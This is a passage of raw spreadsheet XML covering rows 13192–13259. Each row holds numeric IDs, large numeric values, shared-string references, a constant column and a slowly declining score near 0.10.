      <c r="D13192" s="2">
        <v>1.0</v>
      </c>
      <c r="E13192" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13192" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13193" ht="15.75" customHeight="1">
      <c r="A13193" s="1">
        <v>18606.0</v>
      </c>
      <c r="B13193" s="2">
        <v>5.3296858E7</v>
      </c>
      <c r="C13193" s="2" t="s">
        <v>12693</v>
      </c>
      <c r="D13193" s="2">
        <v>1.0</v>
      </c>
      <c r="E13193" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13193" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13194" ht="15.75" customHeight="1">
      <c r="A13194" s="1">
        <v>20475.0</v>
      </c>
      <c r="B13194" s="2">
        <v>1.2823665E7</v>
      </c>
      <c r="C13194" s="2" t="s">
        <v>12694</v>
      </c>
      <c r="D13194" s="2">
        <v>1.0</v>
      </c>
      <c r="E13194" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13194" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13195" ht="15.75" customHeight="1">
      <c r="A13195" s="1">
        <v>25026.0</v>
      </c>
      <c r="B13195" s="2">
        <v>1.2823664E7</v>
      </c>
      <c r="C13195" s="2" t="s">
        <v>12694</v>
      </c>
      <c r="D13195" s="2">
        <v>1.0</v>
      </c>
      <c r="E13195" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13195" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13196" ht="15.75" customHeight="1">
      <c r="A13196" s="1">
        <v>31675.0</v>
      </c>
      <c r="B13196" s="2">
        <v>5187255.0</v>
      </c>
      <c r="C13196" s="2" t="s">
        <v>12695</v>
      </c>
      <c r="D13196" s="2">
        <v>1.0</v>
      </c>
      <c r="E13196" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13196" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13197" ht="15.75" customHeight="1">
      <c r="A13197" s="1">
        <v>34111.0</v>
      </c>
      <c r="B13197" s="2">
        <v>9728011.0</v>
      </c>
      <c r="C13197" s="2" t="s">
        <v>12696</v>
      </c>
      <c r="D13197" s="2">
        <v>1.0</v>
      </c>
      <c r="E13197" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13197" s="2">
        <v>0.1042884990253411</v>
      </c>
    </row>
    <row r="13198" ht="15.75" customHeight="1">
      <c r="A13198" s="1">
        <v>108.0</v>
      </c>
      <c r="B13198" s="2">
        <v>1.295882E7</v>
      </c>
      <c r="C13198" s="2" t="s">
        <v>12697</v>
      </c>
      <c r="D13198" s="2">
        <v>1.0</v>
      </c>
      <c r="E13198" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13198" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="13199" ht="15.75" customHeight="1">
      <c r="A13199" s="1">
        <v>5117.0</v>
      </c>
      <c r="B13199" s="2">
        <v>4.4541263E7</v>
      </c>
      <c r="C13199" s="2" t="s">
        <v>12698</v>
      </c>
      <c r="D13199" s="2">
        <v>1.0</v>
      </c>
      <c r="E13199" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13199" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="13200" ht="15.75" customHeight="1">
      <c r="A13200" s="1">
        <v>8438.0</v>
      </c>
      <c r="B13200" s="2">
        <v>5.3954461E7</v>
      </c>
      <c r="C13200" s="2" t="s">
        <v>12699</v>
      </c>
      <c r="D13200" s="2">
        <v>1.0</v>
      </c>
      <c r="E13200" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13200" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="13201" ht="15.75" customHeight="1">
      <c r="A13201" s="1">
        <v>9971.0</v>
      </c>
      <c r="B13201" s="2">
        <v>5.6942487E7</v>
      </c>
      <c r="C13201" s="2" t="s">
        <v>12700</v>
      </c>
      <c r="D13201" s="2">
        <v>1.0</v>
      </c>
      <c r="E13201" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13201" s="2">
        <v>0.1041666666666667</v>
      </c>
    </row>
    <row r="13202" ht="15.75" customHeight="1">
      <c r="A13202" s="1">
        <v>2456.0</v>
      </c>
      <c r="B13202" s="2">
        <v>3.3726464E7</v>
      </c>
      <c r="C13202" s="2" t="s">
        <v>12701</v>
      </c>
      <c r="D13202" s="2">
        <v>1.0</v>
      </c>
      <c r="E13202" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13202" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13203" ht="15.75" customHeight="1">
      <c r="A13203" s="1">
        <v>3862.0</v>
      </c>
      <c r="B13203" s="2">
        <v>4.0325521E7</v>
      </c>
      <c r="C13203" s="2" t="s">
        <v>12702</v>
      </c>
      <c r="D13203" s="2">
        <v>1.0</v>
      </c>
      <c r="E13203" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13203" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13204" ht="15.75" customHeight="1">
      <c r="A13204" s="1">
        <v>5290.0</v>
      </c>
      <c r="B13204" s="2">
        <v>4.5207113E7</v>
      </c>
      <c r="C13204" s="2" t="s">
        <v>12703</v>
      </c>
      <c r="D13204" s="2">
        <v>1.0</v>
      </c>
      <c r="E13204" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13204" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13205" ht="15.75" customHeight="1">
      <c r="A13205" s="1">
        <v>8600.0</v>
      </c>
      <c r="B13205" s="2">
        <v>5.4258373E7</v>
      </c>
      <c r="C13205" s="2" t="s">
        <v>12704</v>
      </c>
      <c r="D13205" s="2">
        <v>1.0</v>
      </c>
      <c r="E13205" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13205" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13206" ht="15.75" customHeight="1">
      <c r="A13206" s="1">
        <v>9396.0</v>
      </c>
      <c r="B13206" s="2">
        <v>5.5749094E7</v>
      </c>
      <c r="C13206" s="2" t="s">
        <v>12705</v>
      </c>
      <c r="D13206" s="2">
        <v>1.0</v>
      </c>
      <c r="E13206" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13206" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13207" ht="15.75" customHeight="1">
      <c r="A13207" s="1">
        <v>11509.0</v>
      </c>
      <c r="B13207" s="2">
        <v>2.2181276E7</v>
      </c>
      <c r="C13207" s="2" t="s">
        <v>12706</v>
      </c>
      <c r="D13207" s="2">
        <v>1.0</v>
      </c>
      <c r="E13207" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13207" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13208" ht="15.75" customHeight="1">
      <c r="A13208" s="1">
        <v>22881.0</v>
      </c>
      <c r="B13208" s="2">
        <v>4.7669645E7</v>
      </c>
      <c r="C13208" s="2" t="s">
        <v>12707</v>
      </c>
      <c r="D13208" s="2">
        <v>1.0</v>
      </c>
      <c r="E13208" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13208" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13209" ht="15.75" customHeight="1">
      <c r="A13209" s="1">
        <v>25429.0</v>
      </c>
      <c r="B13209" s="2">
        <v>1.3829852E7</v>
      </c>
      <c r="C13209" s="2" t="s">
        <v>12708</v>
      </c>
      <c r="D13209" s="2">
        <v>1.0</v>
      </c>
      <c r="E13209" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13209" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13210" ht="15.75" customHeight="1">
      <c r="A13210" s="1">
        <v>28056.0</v>
      </c>
      <c r="B13210" s="2">
        <v>2.4571537E7</v>
      </c>
      <c r="C13210" s="2" t="s">
        <v>12641</v>
      </c>
      <c r="D13210" s="2">
        <v>1.0</v>
      </c>
      <c r="E13210" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13210" s="2">
        <v>0.104040404040404</v>
      </c>
    </row>
    <row r="13211" ht="15.75" customHeight="1">
      <c r="A13211" s="1">
        <v>17628.0</v>
      </c>
      <c r="B13211" s="2">
        <v>5.0381034E7</v>
      </c>
      <c r="C13211" s="2" t="s">
        <v>12709</v>
      </c>
      <c r="D13211" s="2">
        <v>1.0</v>
      </c>
      <c r="E13211" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13211" s="2">
        <v>0.1039094650205761</v>
      </c>
    </row>
    <row r="13212" ht="15.75" customHeight="1">
      <c r="A13212" s="1">
        <v>7501.0</v>
      </c>
      <c r="B13212" s="2">
        <v>5.1382338E7</v>
      </c>
      <c r="C13212" s="2" t="s">
        <v>12710</v>
      </c>
      <c r="D13212" s="2">
        <v>1.0</v>
      </c>
      <c r="E13212" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13212" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="13213" ht="15.75" customHeight="1">
      <c r="A13213" s="1">
        <v>7711.0</v>
      </c>
      <c r="B13213" s="2">
        <v>5.2002053E7</v>
      </c>
      <c r="C13213" s="2" t="s">
        <v>12711</v>
      </c>
      <c r="D13213" s="2">
        <v>1.0</v>
      </c>
      <c r="E13213" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13213" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="13214" ht="15.75" customHeight="1">
      <c r="A13214" s="1">
        <v>9540.0</v>
      </c>
      <c r="B13214" s="2">
        <v>5.6020557E7</v>
      </c>
      <c r="C13214" s="2" t="s">
        <v>12712</v>
      </c>
      <c r="D13214" s="2">
        <v>1.0</v>
      </c>
      <c r="E13214" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13214" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="13215" ht="15.75" customHeight="1">
      <c r="A13215" s="1">
        <v>20846.0</v>
      </c>
      <c r="B13215" s="2">
        <v>1.5656835E7</v>
      </c>
      <c r="C13215" s="2" t="s">
        <v>12713</v>
      </c>
      <c r="D13215" s="2">
        <v>1.0</v>
      </c>
      <c r="E13215" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13215" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="13216" ht="15.75" customHeight="1">
      <c r="A13216" s="1">
        <v>32361.0</v>
      </c>
      <c r="B13216" s="2">
        <v>5.5948391E7</v>
      </c>
      <c r="C13216" s="2" t="s">
        <v>12714</v>
      </c>
      <c r="D13216" s="2">
        <v>1.0</v>
      </c>
      <c r="E13216" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13216" s="2">
        <v>0.1037735849056604</v>
      </c>
    </row>
    <row r="13217" ht="15.75" customHeight="1">
      <c r="A13217" s="1">
        <v>15842.0</v>
      </c>
      <c r="B13217" s="2">
        <v>4.4401695E7</v>
      </c>
      <c r="C13217" s="2" t="s">
        <v>12715</v>
      </c>
      <c r="D13217" s="2">
        <v>1.0</v>
      </c>
      <c r="E13217" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13217" s="2">
        <v>0.1036324786324786</v>
      </c>
    </row>
    <row r="13218" ht="15.75" customHeight="1">
      <c r="A13218" s="1">
        <v>6322.0</v>
      </c>
      <c r="B13218" s="2">
        <v>4.8269444E7</v>
      </c>
      <c r="C13218" s="2" t="s">
        <v>12716</v>
      </c>
      <c r="D13218" s="2">
        <v>1.0</v>
      </c>
      <c r="E13218" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13218" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13219" ht="15.75" customHeight="1">
      <c r="A13219" s="1">
        <v>9552.0</v>
      </c>
      <c r="B13219" s="2">
        <v>5.6033067E7</v>
      </c>
      <c r="C13219" s="2" t="s">
        <v>12717</v>
      </c>
      <c r="D13219" s="2">
        <v>1.0</v>
      </c>
      <c r="E13219" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13219" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13220" ht="15.75" customHeight="1">
      <c r="A13220" s="1">
        <v>10018.0</v>
      </c>
      <c r="B13220" s="2">
        <v>5.7039101E7</v>
      </c>
      <c r="C13220" s="2" t="s">
        <v>12718</v>
      </c>
      <c r="D13220" s="2">
        <v>1.0</v>
      </c>
      <c r="E13220" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13220" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13221" ht="15.75" customHeight="1">
      <c r="A13221" s="1">
        <v>12563.0</v>
      </c>
      <c r="B13221" s="2">
        <v>2.9939308E7</v>
      </c>
      <c r="C13221" s="2" t="s">
        <v>12719</v>
      </c>
      <c r="D13221" s="2">
        <v>1.0</v>
      </c>
      <c r="E13221" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13221" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13222" ht="15.75" customHeight="1">
      <c r="A13222" s="1">
        <v>14060.0</v>
      </c>
      <c r="B13222" s="2">
        <v>3.7569223E7</v>
      </c>
      <c r="C13222" s="2" t="s">
        <v>12720</v>
      </c>
      <c r="D13222" s="2">
        <v>1.0</v>
      </c>
      <c r="E13222" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13222" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13223" ht="15.75" customHeight="1">
      <c r="A13223" s="1">
        <v>14260.0</v>
      </c>
      <c r="B13223" s="2">
        <v>3.8390159E7</v>
      </c>
      <c r="C13223" s="2" t="s">
        <v>12721</v>
      </c>
      <c r="D13223" s="2">
        <v>1.0</v>
      </c>
      <c r="E13223" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13223" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13224" ht="15.75" customHeight="1">
      <c r="A13224" s="1">
        <v>16195.0</v>
      </c>
      <c r="B13224" s="2">
        <v>4.56606E7</v>
      </c>
      <c r="C13224" s="2" t="s">
        <v>12722</v>
      </c>
      <c r="D13224" s="2">
        <v>1.0</v>
      </c>
      <c r="E13224" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13224" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13225" ht="15.75" customHeight="1">
      <c r="A13225" s="1">
        <v>17027.0</v>
      </c>
      <c r="B13225" s="2">
        <v>4.8462909E7</v>
      </c>
      <c r="C13225" s="2" t="s">
        <v>12723</v>
      </c>
      <c r="D13225" s="2">
        <v>1.0</v>
      </c>
      <c r="E13225" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13225" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13226" ht="15.75" customHeight="1">
      <c r="A13226" s="1">
        <v>18543.0</v>
      </c>
      <c r="B13226" s="2">
        <v>5.312041E7</v>
      </c>
      <c r="C13226" s="2" t="s">
        <v>12724</v>
      </c>
      <c r="D13226" s="2">
        <v>1.0</v>
      </c>
      <c r="E13226" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13226" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13227" ht="15.75" customHeight="1">
      <c r="A13227" s="1">
        <v>24576.0</v>
      </c>
      <c r="B13227" s="2">
        <v>1.1323775E7</v>
      </c>
      <c r="C13227" s="2" t="s">
        <v>12725</v>
      </c>
      <c r="D13227" s="2">
        <v>1.0</v>
      </c>
      <c r="E13227" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13227" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13228" ht="15.75" customHeight="1">
      <c r="A13228" s="1">
        <v>28325.0</v>
      </c>
      <c r="B13228" s="2">
        <v>2.5847114E7</v>
      </c>
      <c r="C13228" s="2" t="s">
        <v>12726</v>
      </c>
      <c r="D13228" s="2">
        <v>1.0</v>
      </c>
      <c r="E13228" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13228" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13229" ht="15.75" customHeight="1">
      <c r="A13229" s="1">
        <v>31684.0</v>
      </c>
      <c r="B13229" s="2">
        <v>5.1884655E7</v>
      </c>
      <c r="C13229" s="2" t="s">
        <v>12727</v>
      </c>
      <c r="D13229" s="2">
        <v>1.0</v>
      </c>
      <c r="E13229" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13229" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13230" ht="15.75" customHeight="1">
      <c r="A13230" s="1">
        <v>32085.0</v>
      </c>
      <c r="B13230" s="2">
        <v>5.38902E7</v>
      </c>
      <c r="C13230" s="2" t="s">
        <v>12728</v>
      </c>
      <c r="D13230" s="2">
        <v>1.0</v>
      </c>
      <c r="E13230" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13230" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13231" ht="15.75" customHeight="1">
      <c r="A13231" s="1">
        <v>34118.0</v>
      </c>
      <c r="B13231" s="2">
        <v>9766328.0</v>
      </c>
      <c r="C13231" s="2" t="s">
        <v>12729</v>
      </c>
      <c r="D13231" s="2">
        <v>1.0</v>
      </c>
      <c r="E13231" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13231" s="2">
        <v>0.1027777777777778</v>
      </c>
    </row>
    <row r="13232" ht="15.75" customHeight="1">
      <c r="A13232" s="1">
        <v>6805.0</v>
      </c>
      <c r="B13232" s="2">
        <v>4.9525029E7</v>
      </c>
      <c r="C13232" s="2" t="s">
        <v>12730</v>
      </c>
      <c r="D13232" s="2">
        <v>1.0</v>
      </c>
      <c r="E13232" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13232" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="13233" ht="15.75" customHeight="1">
      <c r="A13233" s="1">
        <v>23234.0</v>
      </c>
      <c r="B13233" s="2">
        <v>5.2905952E7</v>
      </c>
      <c r="C13233" s="2" t="s">
        <v>12731</v>
      </c>
      <c r="D13233" s="2">
        <v>1.0</v>
      </c>
      <c r="E13233" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13233" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="13234" ht="15.75" customHeight="1">
      <c r="A13234" s="1">
        <v>27860.0</v>
      </c>
      <c r="B13234" s="2">
        <v>2.3435612E7</v>
      </c>
      <c r="C13234" s="2" t="s">
        <v>12732</v>
      </c>
      <c r="D13234" s="2">
        <v>1.0</v>
      </c>
      <c r="E13234" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13234" s="2">
        <v>0.1024904214559387</v>
      </c>
    </row>
    <row r="13235" ht="15.75" customHeight="1">
      <c r="A13235" s="1">
        <v>3429.0</v>
      </c>
      <c r="B13235" s="2">
        <v>3.8198247E7</v>
      </c>
      <c r="C13235" s="2" t="s">
        <v>12733</v>
      </c>
      <c r="D13235" s="2">
        <v>1.0</v>
      </c>
      <c r="E13235" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13235" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="13236" ht="15.75" customHeight="1">
      <c r="A13236" s="1">
        <v>19796.0</v>
      </c>
      <c r="B13236" s="2">
        <v>5.6839518E7</v>
      </c>
      <c r="C13236" s="2" t="s">
        <v>12734</v>
      </c>
      <c r="D13236" s="2">
        <v>1.0</v>
      </c>
      <c r="E13236" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13236" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="13237" ht="15.75" customHeight="1">
      <c r="A13237" s="1">
        <v>24084.0</v>
      </c>
      <c r="B13237" s="2">
        <v>9728012.0</v>
      </c>
      <c r="C13237" s="2" t="s">
        <v>12696</v>
      </c>
      <c r="D13237" s="2">
        <v>1.0</v>
      </c>
      <c r="E13237" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13237" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="13238" ht="15.75" customHeight="1">
      <c r="A13238" s="1">
        <v>30450.0</v>
      </c>
      <c r="B13238" s="2">
        <v>3.9441451E7</v>
      </c>
      <c r="C13238" s="2" t="s">
        <v>12735</v>
      </c>
      <c r="D13238" s="2">
        <v>1.0</v>
      </c>
      <c r="E13238" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13238" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="13239" ht="15.75" customHeight="1">
      <c r="A13239" s="1">
        <v>31850.0</v>
      </c>
      <c r="B13239" s="2">
        <v>5.2758623E7</v>
      </c>
      <c r="C13239" s="2" t="s">
        <v>12736</v>
      </c>
      <c r="D13239" s="2">
        <v>1.0</v>
      </c>
      <c r="E13239" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13239" s="2">
        <v>0.1023391812865497</v>
      </c>
    </row>
    <row r="13240" ht="15.75" customHeight="1">
      <c r="A13240" s="1">
        <v>18455.0</v>
      </c>
      <c r="B13240" s="2">
        <v>5.2819983E7</v>
      </c>
      <c r="C13240" s="2" t="s">
        <v>12737</v>
      </c>
      <c r="D13240" s="2">
        <v>1.0</v>
      </c>
      <c r="E13240" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13240" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="13241" ht="15.75" customHeight="1">
      <c r="A13241" s="1">
        <v>20711.0</v>
      </c>
      <c r="B13241" s="2">
        <v>1.460029E7</v>
      </c>
      <c r="C13241" s="2" t="s">
        <v>12738</v>
      </c>
      <c r="D13241" s="2">
        <v>1.0</v>
      </c>
      <c r="E13241" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13241" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="13242" ht="15.75" customHeight="1">
      <c r="A13242" s="1">
        <v>23481.0</v>
      </c>
      <c r="B13242" s="2">
        <v>5.7299163E7</v>
      </c>
      <c r="C13242" s="2" t="s">
        <v>12739</v>
      </c>
      <c r="D13242" s="2">
        <v>1.0</v>
      </c>
      <c r="E13242" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13242" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="13243" ht="15.75" customHeight="1">
      <c r="A13243" s="1">
        <v>29274.0</v>
      </c>
      <c r="B13243" s="2">
        <v>3.0994721E7</v>
      </c>
      <c r="C13243" s="2" t="s">
        <v>12740</v>
      </c>
      <c r="D13243" s="2">
        <v>1.0</v>
      </c>
      <c r="E13243" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13243" s="2">
        <v>0.1021825396825397</v>
      </c>
    </row>
    <row r="13244" ht="15.75" customHeight="1">
      <c r="A13244" s="1">
        <v>21918.0</v>
      </c>
      <c r="B13244" s="2">
        <v>2.8265836E7</v>
      </c>
      <c r="C13244" s="2" t="s">
        <v>12741</v>
      </c>
      <c r="D13244" s="2">
        <v>1.0</v>
      </c>
      <c r="E13244" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13244" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="13245" ht="15.75" customHeight="1">
      <c r="A13245" s="1">
        <v>22388.0</v>
      </c>
      <c r="B13245" s="2">
        <v>3.5345142E7</v>
      </c>
      <c r="C13245" s="2" t="s">
        <v>12742</v>
      </c>
      <c r="D13245" s="2">
        <v>1.0</v>
      </c>
      <c r="E13245" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13245" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="13246" ht="15.75" customHeight="1">
      <c r="A13246" s="1">
        <v>28976.0</v>
      </c>
      <c r="B13246" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C13246" s="2" t="s">
        <v>12743</v>
      </c>
      <c r="D13246" s="2">
        <v>1.0</v>
      </c>
      <c r="E13246" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13246" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="13247" ht="15.75" customHeight="1">
      <c r="A13247" s="1">
        <v>32657.0</v>
      </c>
      <c r="B13247" s="2">
        <v>5904956.0</v>
      </c>
      <c r="C13247" s="2" t="s">
        <v>12642</v>
      </c>
      <c r="D13247" s="2">
        <v>1.0</v>
      </c>
      <c r="E13247" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13247" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="13248" ht="15.75" customHeight="1">
      <c r="A13248" s="1">
        <v>32710.0</v>
      </c>
      <c r="B13248" s="2">
        <v>5953884.0</v>
      </c>
      <c r="C13248" s="2" t="s">
        <v>12744</v>
      </c>
      <c r="D13248" s="2">
        <v>1.0</v>
      </c>
      <c r="E13248" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13248" s="2">
        <v>0.102020202020202</v>
      </c>
    </row>
    <row r="13249" ht="15.75" customHeight="1">
      <c r="A13249" s="1">
        <v>1132.0</v>
      </c>
      <c r="B13249" s="2">
        <v>2.4188227E7</v>
      </c>
      <c r="C13249" s="2" t="s">
        <v>12745</v>
      </c>
      <c r="D13249" s="2">
        <v>1.0</v>
      </c>
      <c r="E13249" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13249" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13250" ht="15.75" customHeight="1">
      <c r="A13250" s="1">
        <v>4783.0</v>
      </c>
      <c r="B13250" s="2">
        <v>4.345304E7</v>
      </c>
      <c r="C13250" s="2" t="s">
        <v>12746</v>
      </c>
      <c r="D13250" s="2">
        <v>1.0</v>
      </c>
      <c r="E13250" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13250" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13251" ht="15.75" customHeight="1">
      <c r="A13251" s="1">
        <v>8954.0</v>
      </c>
      <c r="B13251" s="2">
        <v>5.4924949E7</v>
      </c>
      <c r="C13251" s="2" t="s">
        <v>12747</v>
      </c>
      <c r="D13251" s="2">
        <v>1.0</v>
      </c>
      <c r="E13251" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13251" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13252" ht="15.75" customHeight="1">
      <c r="A13252" s="1">
        <v>10252.0</v>
      </c>
      <c r="B13252" s="2">
        <v>5.7551772E7</v>
      </c>
      <c r="C13252" s="2" t="s">
        <v>12748</v>
      </c>
      <c r="D13252" s="2">
        <v>1.0</v>
      </c>
      <c r="E13252" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13252" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13253" ht="15.75" customHeight="1">
      <c r="A13253" s="1">
        <v>14958.0</v>
      </c>
      <c r="B13253" s="2">
        <v>4.1324563E7</v>
      </c>
      <c r="C13253" s="2" t="s">
        <v>12749</v>
      </c>
      <c r="D13253" s="2">
        <v>1.0</v>
      </c>
      <c r="E13253" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13253" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13254" ht="15.75" customHeight="1">
      <c r="A13254" s="1">
        <v>15742.0</v>
      </c>
      <c r="B13254" s="2">
        <v>4.4114902E7</v>
      </c>
      <c r="C13254" s="2" t="s">
        <v>12750</v>
      </c>
      <c r="D13254" s="2">
        <v>1.0</v>
      </c>
      <c r="E13254" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13254" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13255" ht="15.75" customHeight="1">
      <c r="A13255" s="1">
        <v>26969.0</v>
      </c>
      <c r="B13255" s="2">
        <v>1.9640834E7</v>
      </c>
      <c r="C13255" s="2" t="s">
        <v>12751</v>
      </c>
      <c r="D13255" s="2">
        <v>1.0</v>
      </c>
      <c r="E13255" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13255" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13256" ht="15.75" customHeight="1">
      <c r="A13256" s="1">
        <v>28975.0</v>
      </c>
      <c r="B13256" s="2">
        <v>2.9812644E7</v>
      </c>
      <c r="C13256" s="2" t="s">
        <v>12752</v>
      </c>
      <c r="D13256" s="2">
        <v>1.0</v>
      </c>
      <c r="E13256" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13256" s="2">
        <v>0.1018518518518518</v>
      </c>
    </row>
    <row r="13257" ht="15.75" customHeight="1">
      <c r="A13257" s="1">
        <v>7381.0</v>
      </c>
      <c r="B13257" s="2">
        <v>5.1068964E7</v>
      </c>
      <c r="C13257" s="2" t="s">
        <v>12753</v>
      </c>
      <c r="D13257" s="2">
        <v>1.0</v>
      </c>
      <c r="E13257" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13257" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="13258" ht="15.75" customHeight="1">
      <c r="A13258" s="1">
        <v>11316.0</v>
      </c>
      <c r="B13258" s="2">
        <v>2.1068518E7</v>
      </c>
      <c r="C13258" s="2" t="s">
        <v>12754</v>
      </c>
      <c r="D13258" s="2">
        <v>1.0</v>
      </c>
      <c r="E13258" s="3" t="s">
        <v>10480</v>
      </c>
      <c r="F13258" s="2">
        <v>0.1016771488469601</v>
      </c>
    </row>
    <row r="13259" ht="15.75" customHeight="1">
      <c r="A13259" s="1">
        <v>17336.0</v>
      </c>
      <c r="B13259" s="2">
        <v>4.9392532E7</v>
      </c>
      <c r="C13259" s="2" t="s">
        <v>12755</v>
      </c>
      <c r="D13259" s="2">
        <v>1.0</v>
